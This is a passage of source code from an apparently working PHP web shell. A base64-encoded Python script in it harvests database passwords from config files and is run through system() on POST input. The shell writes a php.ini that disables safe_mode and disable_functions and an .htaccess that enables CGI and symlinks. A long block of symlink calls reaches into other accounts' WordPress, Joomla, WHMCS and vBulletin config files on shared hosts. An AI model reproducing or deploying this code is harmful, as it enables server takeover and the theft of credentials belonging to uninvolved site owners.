AgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
  296. $file = fopen("cp.py","w+");
  297. $write = fwrite ($file ,base64_decode($cp));
  298. fclose($file);
  299. chmod("cp.py",0755);
  300. $url = $_POST['url'];
  301. echo"<center>
  302. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
  303. system("python cp.py $url config");
  304. unlink ('cp.py');
  305. echo"</textarea>
  306. </center>";
  307. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."> << BACK</a>";
  308. exit;
  309. }
  310. if($_POST['matikan']=='sekatan'){
  311. @error_reporting(0);
  312. $phpini =
  313. 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
  314. $file = fopen("php.ini","w+");
  315. $write = fwrite ($file ,base64_decode($phpini));
  316. fclose($file);
  317. $htaccess =
  318. 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
  319. $file = fopen(".htaccess","w+");
  320. $write = fwrite ($file ,base64_decode($htaccess));
  321. echo "<hr><center><b>DONE!";
  322. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  323. exit;
  324. }
  325. if($_POST['mendapatkan']=='passwd'){
  326. @set_magic_quotes_runtime(0);
  327. ob_start();
  328. error_reporting(0);
  329. @set_time_limit(0);
  330. @ini_set('max_execution_time',0);
  331. @ini_set('output_buffering',0);
  332. $fn = $_POST['foldername'];
  333. //all function here
  334.  
  335. function syml($usern,$pdomain)
  336. {
  337. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  338. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  339. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  340. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  341. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  342. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  343. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  344. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  345. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  346. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  347. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  348. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  349. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  350. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  351. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  352. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  353. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  354. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  355. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  356. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  357. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  358. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  359. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  360. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  361. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  362. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  363. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  364. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  365. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  366. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  367. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  368. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  369. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  370. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  371. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  372. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  373. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  374. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  375. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  376. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  377. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  378. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  379. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  380. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  381. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  382. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  383. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  384. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  385. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  386. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  387. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  388. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  389. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  390. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  391. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  392. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  393. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  394. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  395. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  396. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  397. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  398. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  399. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  400. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  401. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  402. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  403. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  404. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  405. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  406. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  407. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  408. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  409. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  410. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  411. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  412. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  413. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  414. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  415. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  416. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  417. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  418. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  419. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  420. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  421. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  422. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  423. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  424. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  425. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  426. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  427. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  428. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  429. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  430. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  431. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  432. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  433. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  434. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  435. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  436. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  437. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  438. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  439. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  440. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  441. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  442. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  443. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  444. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  445. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  446. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  447. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  448. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  449. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  450. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  451. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  452. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  453. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  454. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  455. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  456. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  457. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  458. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  459. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  460. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  461. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  462. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  463. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  464. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  465. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  466. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  467. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  468. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  469. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  470. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  471. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  472. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  473. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  474. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  475. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  476. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  477. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  478. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  479. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  480. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  481. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  482. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  483. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  484. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  485. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  486. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  487. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  488. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  489. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  490. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  491. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  492. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  493. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  494. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  495. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  496. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  497. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
